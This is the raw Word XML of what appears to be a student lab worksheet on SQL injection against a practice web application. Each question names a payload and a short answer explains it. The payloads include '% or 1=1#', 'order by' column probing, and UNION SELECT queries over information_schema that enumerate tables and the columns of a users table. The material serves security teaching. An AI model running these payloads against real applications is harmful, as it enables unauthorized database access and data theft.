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1C25" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:line="256" w:lineRule="exact"/>
        <w:ind w:right="2830"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485500A4" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2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1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What is the purpose of entering different User ID values and clicking Submit in the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basic</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-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commands section?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00067404" w14:textId="77777777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931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">By entering different User ID values and analyzing the application's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">responses,   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                              we can gather information about the underlying database structure and test for SQLi vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09523EB6" w14:textId="2E7B4054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931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495FA052" wp14:editId="74964067">
            <wp:extent cx="2446020" cy="1286468"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4687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4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518" cy="12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A26A" w14:textId="2D2EF954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931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F213EC8" wp14:editId="49725799">
            <wp:extent cx="2263140" cy="1125213"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="15000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3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908" cy="11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BF5A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2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5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Explain the significance of the 'order by' commands with numbers in the SQL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injection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context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CCAEB" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="115"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Identifying the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B417070" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="115"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attackers can use the 'order by' command along with sequential numbers to determine the number of columns in the result set returned by a SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37277A55" w14:textId="7E1FE6C6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931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E116AA" wp14:editId="672F599D">
            <wp:extent cx="2286000" cy="1139608"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8167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77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727" cy="11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A5B6" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2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2" w:lineRule="auto"/>
        <w:ind w:right="114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What does the SQL injection payload '% or 1=1#' accomplish in the context of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displaying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values based on the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surname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condition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394CE691" w14:textId="2E40EB22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931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The '%' symbol acts as a wildcard character in SQL, matching any characters in the specified column. When used at the beginning of a string, as in '% or 1=1#', it indicates that any value for the surname column is acceptable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631E8BA" w14:textId="18AC831F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D6CE6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787D8808" wp14:editId="02D88815">
            <wp:extent cx="1996440" cy="2744270"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="183022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24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375" cy="27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449B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2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1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 xml:space="preserve">Why is there a deliberate SQL syntax error in the command 'select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,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last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-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from users where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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ='%'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or '1'='1';'?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DC72C" w14:textId="77777777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51E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM users WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @user_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC90E5" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00051E3C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0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How</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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does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URL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injection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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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-1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provided</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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links</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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demonstrate</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-1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injection</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-57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a web application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52AC51" w14:textId="07D02D95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984BFD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58716FF7" wp14:editId="57AEDBD6">
            <wp:extent cx="5731510" cy="1045210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="7200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557" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00051E3C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1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Explain the purpose of the SQL injection payloads used for displaying database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version,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hostname, username, and database name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8D638B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00051E3C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051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL injection payloads used for displaying database version, hostname, username, and database name serve several purposes in the context of exploiting SQL injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D75BA" w14:textId="188AC2CB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984BFD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5FB027" wp14:editId="57F589CE">
            <wp:extent cx="2527326" cy="1272540"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="9333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9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910" cy="12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658D" w14:textId="1A35F63A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984BFD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2333D954" wp14:editId="17251F38">
            <wp:extent cx="2591893" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="136043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262" cy="13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D35D" w14:textId="11831631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52313">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF719E8" wp14:editId="5EA9DDC1">
            <wp:extent cx="2587280" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="134279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8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507" cy="13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9EAC" w14:textId="14F7277C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52313">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68B26C07" wp14:editId="1FE73A49">
            <wp:extent cx="2453640" cy="1295937"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="107801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5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07" cy="12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49A" w14:textId="77777777" w:rsidR="00230D57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2" w:lineRule="auto"/>
        <w:ind w:right="114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 xml:space="preserve">What is the significance of the command '% and 1=0 union select null, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #'</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-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 listing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tables in the</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-2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information schema?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB8E28" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00051E3C" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="362" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="114"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL injection command '% and 1=0 union select null, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #' is significant because it leverages the UNION operator to extract information from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051E3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> system view in a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EED844B" w14:textId="0E2C0DC9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52313">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B199456" wp14:editId="39F2B0E0">
            <wp:extent cx="5385065" cy="2941320"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="155674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0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7041" cy="29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6DB0" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="004B0736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08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How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does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command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'%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and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1=0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union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select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null,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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> like 'user%'#' list user-related tables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-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information schema?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDA945" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="004B0736" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="108"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL command '% and 1=0 union select null, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B0736">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> like 'user%'#' is significant because it utilizes SQL injection to list tables in the information schema that are related to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF11769" w14:textId="02E584A5" w:rsidR="00230D57" w:rsidRPr="000931D2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52313">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A1E5E32" wp14:editId="529FA6DE">
            <wp:extent cx="3234027" cy="2567940"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="5512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6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827" cy="25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365F" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="004B0736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360" w:lineRule="auto"/>
        <w:ind w:right="111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>Describe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purpose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of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the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command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'%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and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1=0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union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select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null,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concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(table_name,0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">_name) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where</w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="-3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= 'users' #'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819BDDB" w14:textId="2E805942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230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL command '% and 1=0 union select null, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(table_name,0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">_name) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'users' #' serves the purpose of extracting column names belonging to the 'users' table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B81F9" w14:textId="33E78591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E52313">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FBCFA3" wp14:editId="2C729199">
            <wp:extent cx="3665327" cy="2491740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="38343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4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1628" cy="25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235E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00051E3C" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:hanging="361"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain    </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="10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how     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="8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the     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="7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payload     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="EC0000"/>
          <w:spacing w:val="8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'%     </w:t>
      </w:r>
      <w:r w:rsidRPr="000931D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
